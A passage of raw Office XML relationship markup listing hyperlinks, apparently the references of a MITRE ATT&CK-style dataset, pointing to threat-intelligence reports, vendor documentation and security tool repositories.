Target="https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" TargetMode="External"/><Relationship Id="rId2849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x46.html" TargetMode="External"/><Relationship Id="rId723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/" TargetMode="External"/><Relationship Id="rId930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/" TargetMode="External"/><Relationship Id="rId1006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/putterpanda/mimikittenz" TargetMode="External"/><Relationship Id="rId1353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html" TargetMode="External"/><Relationship Id="rId1560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/aa362813.aspx" TargetMode="External"/><Relationship Id="rId1658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource" TargetMode="External"/><Relationship Id="rId1865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf" TargetMode="External"/><Relationship Id="rId2404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf" TargetMode="External"/><Relationship Id="rId2611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html" TargetMode="External"/><Relationship Id="rId2709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/page/file/1098481/download" TargetMode="External"/><Relationship Id="rId1213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers" TargetMode="External"/><Relationship Id="rId1420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/" TargetMode="External"/><Relationship Id="rId1518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" TargetMode="External"/><Relationship Id="rId2916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/becoming-system/" TargetMode="External"/><Relationship Id="rId3080" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" TargetMode="External"/><Relationship Id="rId1725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653" TargetMode="External"/><Relationship Id="rId1932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Binary_planting" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1515" TargetMode="External"/><Relationship Id="rId2194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stigviewer.com/stig/windows_server_2016/2019-12-12/finding/V-91779" TargetMode="External"/><Relationship Id="rId3038" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x3D.html" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scip.ch/en/?labs.20150108" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html" TargetMode="External"/><Relationship Id="rId2054" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows" TargetMode="External"/><Relationship Id="rId2261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox" TargetMode="External"/><Relationship Id="rId2499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0x00sec.org/t/super-stealthy-droppers/3715" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/" TargetMode="External"/><Relationship Id="rId678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/" TargetMode="External"/><Relationship Id="rId885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html" TargetMode="External"/><Relationship Id="rId1070" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/" TargetMode="External"/><Relationship Id="rId2121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf" TargetMode="External"/><Relationship Id="rId2359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20220818094600/https:/specterops.io/assets/resources/Certified_Pre-Owned.pdf" TargetMode="External"/><Relationship Id="rId2566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery" TargetMode="External"/><Relationship Id="rId2773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/" TargetMode="External"/><Relationship Id="rId2980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/top25/index.html" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf" TargetMode="External"/><Relationship Id="rId745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/pdf/1611.00791.pdf" TargetMode="External"/><Relationship Id="rId952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vms.drweb.com/virus/?i=4276269" TargetMode="External"/><Relationship Id="rId1168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" TargetMode="External"/><Relationship Id="rId1375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/04za0hca.aspx" TargetMode="External"/><Relationship Id="rId1582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works" TargetMode="External"/><Relationship Id="rId2219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/wcry-ransomware-analysis" TargetMode="External"/><Relationship Id="rId2426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99" TargetMode="External"/><Relationship Id="rId2633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/phishing-starts-inside/" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?page_id=1821" TargetMode="External"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" TargetMode="External"/><Relationship Id="rId812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html" TargetMode="External"/><Relationship Id="rId1028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/" TargetMode="External"/><Relationship Id="rId1235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/zero-day-vulnerability-in-telegram/83800/" TargetMode="External"/><Relationship Id="rId1442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors" TargetMode="External"/><Relationship Id="rId1887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2014-7169" TargetMode="External"/><Relationship Id="rId2840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/" TargetMode="External"/><Relationship Id="rId2938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/websitesecurity/webserver-security/" TargetMode="External"/><Relationship Id="rId1302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/LOLBAS-Project/LOLBAS" TargetMode="External"/><Relationship Id="rId1747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc794757.aspx" TargetMode="External"/><Relationship Id="rId1954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363" TargetMode="External"/><Relationship Id="rId2700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/dez_/status/986614411711442944" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf" TargetMode="External"/><Relationship Id="rId1607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/kb/967715" TargetMode="External"/><Relationship Id="rId1814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa384426" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/just-looking/" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf" TargetMode="External"/><Relationship Id="rId2076" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/" TargetMode="External"/><Relationship Id="rId2283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/iron-viking" TargetMode="External"/><Relationship Id="rId2490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/05/navrat.html" TargetMode="External"/><Relationship Id="rId2588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bromium.com/how-ursnif-evades-detection/" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/" TargetMode="External"/><Relationship Id="rId1092" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.group-ib.com/blog/rtm" TargetMode="External"/><Relationship Id="rId1397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://static.googleusercontent.com/media/research.google.com/en/pubs/archive/43824.pdf" TargetMode="External"/><Relationship Id="rId2143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flylib.com/books/en/4.395.1.192/1/" TargetMode="External"/><Relationship Id="rId2350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/" TargetMode="External"/><Relationship Id="rId2795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/" TargetMode="External"/><Relationship Id="rId767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/" TargetMode="External"/><Relationship Id="rId974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" TargetMode="External"/><Relationship Id="rId2003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/" TargetMode="External"/><Relationship Id="rId2210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/" TargetMode="External"/><Relationship Id="rId2448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/trojanhydraq-incident" TargetMode="External"/><Relationship Id="rId2655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/" TargetMode="External"/><Relationship Id="rId2862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Browser_extension" TargetMode="External"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/reference/run/" TargetMode="External"/><Relationship Id="rId834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html" TargetMode="External"/><Relationship Id="rId1257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf" TargetMode="External"/><Relationship Id="rId1464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf" TargetMode="External"/><Relationship Id="rId1671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/dn408187.aspx" TargetMode="External"/><Relationship Id="rId2308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/" TargetMode="External"/><Relationship Id="rId2515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490866.aspx" TargetMode="External"/><Relationship Id="rId2722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" TargetMode="External"/><Relationship Id="rId901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html" TargetMode="External"/><Relationship Id="rId1117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/" TargetMode="External"/><Relationship Id="rId1324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.autosectools.com/process-hollowing.pdf" TargetMode="External"/><Relationship Id="rId1531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021" TargetMode="External"/><Relationship Id="rId1769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/sysinternals/downloads/sigcheck" TargetMode="External"/><Relationship Id="rId1976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf" TargetMode="External"/><Relationship Id="rId1629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa364404" TargetMode="External"/><Relationship Id="rId1836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil" TargetMode="External"/><Relationship Id="rId1903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique" TargetMode="External"/><Relationship Id="rId2098" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" TargetMode="External"/><Relationship Id="rId3051" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.crysys.hu/2013/03/teamspy/" TargetMode="External"/><Relationship Id="rId2165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" TargetMode="External"/><Relationship Id="rId3009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/" TargetMode="External"/><Relationship Id="rId691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" TargetMode="External"/><Relationship Id="rId789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf" TargetMode="External"/><Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielbohannon/Invoke-Obfuscation" TargetMode="External"/><Relationship Id="rId2025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" TargetMode="External"/><Relationship Id="rId2372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" TargetMode="External"/><Relationship Id="rId2677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" TargetMode="External"/><Relationship Id="rId2884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Microsoft_Windows_library_files" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell" TargetMode="External"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf" TargetMode="External"/><Relationship Id="rId856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" TargetMode="External"/><Relationship Id="rId1181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" TargetMode="External"/><Relationship Id="rId1279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/" TargetMode="External"/><Relationship Id="rId1486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/" TargetMode="External"/><Relationship Id="rId2232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/" TargetMode="External"/><Relationship Id="rId2537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/bb490716.aspx" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/linux/ld_preload-trick-what-is" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cobaltstrike.com/help-browser-pivoting" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" TargetMode="External"/><Relationship Id="rId1041" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN" TargetMode="External"/><Relationship Id="rId1139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses" TargetMode="External"/><Relationship Id="rId1346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/" TargetMode="External"/><Relationship Id="rId1693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes" TargetMode="External"/><Relationship Id="rId1998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" TargetMode="External"/><Relationship Id="rId2744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntu.com/server/docs/service-sssd" TargetMode="External"/><Relationship Id="rId2951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html" TargetMode="External"/><Relationship Id="rId716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" TargetMode="External"/><Relationship Id="rId923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" TargetMode="External"/><Relationship Id="rId1553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/security/fundamentals/steps-secure-identity" TargetMode="External"/><Relationship Id="rId1760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc961760.aspx" TargetMode="External"/><Relationship Id="rId1858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/" TargetMode="External"/><Relationship Id="rId2604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf" TargetMode="External"/><Relationship Id="rId2811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html" TargetMode="External"/><Relationship Id="rId1206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/" TargetMode="External"/><Relationship Id="rId1413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/" TargetMode="External"/><Relationship Id="rId1620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage" TargetMode="External"/><Relationship Id="rId2909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/" TargetMode="External"/><Relationship Id="rId3073" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tlseminar.github.io/downgrade-attacks/" TargetMode="External"/><Relationship Id="rId1718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 